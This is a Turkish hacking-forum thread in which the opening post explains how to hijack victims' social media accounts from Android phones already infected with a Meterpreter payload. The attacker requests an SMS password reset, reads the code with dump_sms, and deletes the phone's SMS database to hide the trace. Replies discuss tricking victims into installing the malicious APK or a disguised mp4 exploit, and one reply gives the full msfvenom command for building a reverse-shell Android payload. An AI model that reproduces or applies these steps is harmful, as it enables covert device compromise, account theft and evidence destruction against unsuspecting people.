1.                                                

Sosyal medya hesaplarını sms ile hacklemek

'Metasploit' forumunda exploit tarafından 21 Eylül 2015 tarihinde açılan konu

  1. exploit

    exploit New Member

    Katılım:
    17 Eylül 2015
    Mesaj:
    104
    Beğeniler:
    1
    Ödül Puanları:
    0

    Merhaba arkadaşlar bu dersde size aklıma gelen bir yöntemi paylaşıcam umarım hoşunuza gider :))
    bu yöntem ile sızdığınız android telefonlardan şifre yenileme yöntemi ile çeşitli sosyal medya hesaplarını çalabilirsiinz tek yapmanız gerekn tel no ya sms yollamak :) bunu yapmak için dump_sms komutu ile sms gönderen ve alanları inceleyin ve karşı tarafın telefon no yu bulun ;) neyse konuyu uzatmıyorum :D

    [​IMG]

    [​IMG]

    [​IMG] Bilmiyorum kısmına tıklayın

    [​IMG] Devam et kısmına tıkla


    [​IMG] Şimdi dump_sms komutu ile gelen smsi alın :)

    [​IMG]

    İşte kodu aldık :D tek yapmanız gereken kopyala yapıştır

    [​IMG]

    [​IMG]

    Aklınızdan bu smsi karşı taraf görecek ne olucak şimdi gibi fikirler geçiyodur kesin çok kolay delete data/data/com.android.providers.telephony/databases/mmssms.db komutu ile sms silin ;)

    ( Bu yöntemi eğer karşı taraf gmail hesabına telden girmiyorsa yapın keylogger olayı çalışmaz ve şifreleri alamazsınız zamnınz da olmayabilir bu yüzden işe yarayabilir. )

    Not : Bu yalnızca aklıma gelen bir yöntem karşı taraf akıllı ise zaten başta o .apk yi yüklemez :D

    Yorumlarınız Bekliyorum :)
     
  2. Bay Pipo

    Bay Pipo Moderator

    Katılım:
    10 Eylül 2015
    Mesaj:
    525
    Beğeniler:
    9
    Ödül Puanları:
    18
    Aynen bence boş bir dava apk yükletemezsın başka şekilde exploit yapmak lazım aklıma geldi benimde mp4 şeklinde exploit oluşturup çalıştırsak backdoordan daha sonra sms yöntemi ile çalışabilir
     
  3. MacTavish

    MacTavish Moderator

    Katılım:
    14 Temmuz 2015
    Mesaj:
    901
    Beğeniler:
    20
    Ödül Puanları:
    18
    Cinsiyet:
    Erkek
    Meslek:
    Öğrenci
    Şehir:
    Van
    Web Sitesi:
    Mükemmel Konu Eline Sağlık :) Bence .apk Uygulama Yükletmek Çok Kolay Zaten Android'de Uygulama Gizleme Var :) Tek Kötü Yanı "Uygulama Ayarlarında" Görünür Zaten Kimse Oraya Bakmayı Düşünmez :)
     
  4. r00ts4

    r00ts4 Administrator Site Yetkilisi

    Katılım:
    20 Aralık 2014
    Mesaj:
    597
    Beğeniler:
    54
    Ödül Puanları:
    28
    sosyal mühendislik tüm hacklerin en kralı :) ellerine sağlık güzel anlatım olmuş
     
  5. Bay Pipo

    Bay Pipo Moderator

    Katılım:
    10 Eylül 2015
    Mesaj:
    525
    Beğeniler:
    9
    Ödül Puanları:
    18
    Eğer yabancı kaynaklı apk ise yüklemesi sıkıntı olur telefondan özel izin verdirip yabancı Kaynakları yükle dersin bu sıkıntı işte
     
  6. ZeRoCooL

    ZeRoCooL New Member

    Katılım:
    1 Aralık 2015
    Mesaj:
    42
    Beğeniler:
    0
    Ödül Puanları:
    0
    Helall olsun abimm üstadımm
     
  7. telexc55

    telexc55 New Member

    Katılım:
    10 Kasım 2015
    Mesaj:
    27
    Beğeniler:
    1
    Ödül Puanları:
    3
    root lu telefonlarda uygulama telefona yüklenip sistem uygulaması yapabiliyor geçen gün başıma geldi bc.vc de bi şey indirecektim antivirüs bişey algıladı uygulama kendini kurup sistem uygulaması yapmış anti virüs olmasa :D gittiydi valla
     
  8. Rüzgar

    Rüzgar New Member

    Katılım:
    15 Şubat 2016
    Mesaj:
    4
    Beğeniler:
    0
    Ödül Puanları:
    0
    Bu konuyla ilgili çalışmalarınızı bekliyorum
     
  9. Rüzgar

    Rüzgar New Member

    Katılım:
    15 Şubat 2016
    Mesaj:
    4
    Beğeniler:
    0
    Ödül Puanları:
    0
  10. PatroN

    PatroN New Member

    Katılım:
    15 Şubat 2016
    Mesaj:
    37
    Beğeniler:
    0
    Ödül Puanları:
    0
    aslinda taktik cok mantikli.. denemek gerekli aslinda paylasim icin tesekkürler
     
  11. farhad9801

    farhad9801 New Member

    Katılım:
    17 Ocak 2016
    Mesaj:
    76
    Beğeniler:
    0
    Ödül Puanları:
    0
    Abi peki telefonun o public ip isini nasil bulucaz?
     
  12. MenIn

    MenIn Albay

    Katılım:
    21 Nisan 2016
    Mesaj:
    720
    Beğeniler:
    0
    Ödül Puanları:
    16
    Şehir:
    Belirtilmemiş
  13. MenIn

    MenIn Albay

    Katılım:
    21 Nisan 2016
    Mesaj:
    720
    Beğeniler:
    0
    Ödül Puanları:
    16
    Şehir:
    Belirtilmemiş
    Sizin kendi telefonunuzun ip'si lazım, lhost için. Karşıdakinin telno'su gerek, ip'sine gerek yok, sanırım.
     
  14. ProHacker

    ProHacker Albay

    Katılım:
    20 Mart 2016
    Mesaj:
    434
    Beğeniler:
    1
    Ödül Puanları:
    18
    Şehir:
    Belirtilmemiş
    İşte bu çok güzel. Ellerine sağlık :D
     
  15. farhad9801

    farhad9801 New Member

    Katılım:
    17 Ocak 2016
    Mesaj:
    76
    Beğeniler:
    0
    Ödül Puanları:
    0
    resimde my android public ip varya onu nerden buluyor yani :D set lhost kendi ip imi yazarsam yetermi?
     
  16. MenIn

    MenIn Albay

    Katılım:
    21 Nisan 2016
    Mesaj:
    720
    Beğeniler:
    0
    Ödül Puanları:
    16
    Şehir:
    Belirtilmemiş
    :DOrayı görmemişim.

    Internal Ip = PC'nizin ip'si
    My anroid's public ip = Tel'inizin, Android'inizin ip'si. IP'yi görmek için:

    Ayarlar>Cihaz Hakkında>Durum(Status). MAC gibi birkaç bilgiyle birlikte size ip adresini de gösterecektir. Bilmediğinizi varsayarak yazdım.
     
  17. farhad9801

    farhad9801 New Member

    Katılım:
    17 Ocak 2016
    Mesaj:
    76
    Beğeniler:
    0
    Ödül Puanları:
    0
    Yani anlamak istediyim kurbanin ipsini nasil buluyoruz? Ayrica o ustde lhost umu yazdiktan sonra gerisini kendisi bulmuyormu (yani resimde oyle gozuyor)
     
  18. MD

    MD New Member

    Katılım:
    18 Temmuz 2016
    Mesaj:
    35
    Beğeniler:
    0
    Ödül Puanları:
    0
    Merhaba, exploit;

    Bilgilendirme için teşekkür ederiz, "MH" ile Payloadı çalıştırmayı göstermişsiniz, ancak konuya henüz yabancı olan arkadaşlar için, Dilerseniz aşağıda yazacağımı konuya ekleyebilirsiniz.

    Exploit'in Aşamasından Önce Payloadı Oluşturmak İsterseniz;

    Terminal > msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > /root/Desktop/Dosya.apk

    Daha sonra ise işlemleri
    exploit'in gösterdiği gibi gerçekleştirebilirsiniz.

    Renklerin Açıklamaları;

    --- ( Linux Tabanlı Local IP / ISS IP, LOCAL IP Görüntülemek için >ifconfig Komutunu Terminalde Kullanabilirsiniz)
    ---( Sisteminizde aktif olan PORT Numarası)
    --- (Terminal Komut Satırıdır)
    --- (Terminale Yazılacak Emir Komut)
    --- (Masaüstünüzde Oluşacak Payloadın Yolu Örnek Girilmiştir)

    Konu için teşekkürler, son derece faydalı bir kaynak.

    İyi Çalışmalar..
     
  19. sen4tor

    sen4tor Member

    Katılım:
    1 Ocak 2017
    Mesaj:
    67
    Beğeniler:
    15
    Ödül Puanları:
    8
    Cinsiyet:
    Erkek
    Hocam resim linkleri yeniler misin ?
     

Bu Sayfayı Paylaş

Share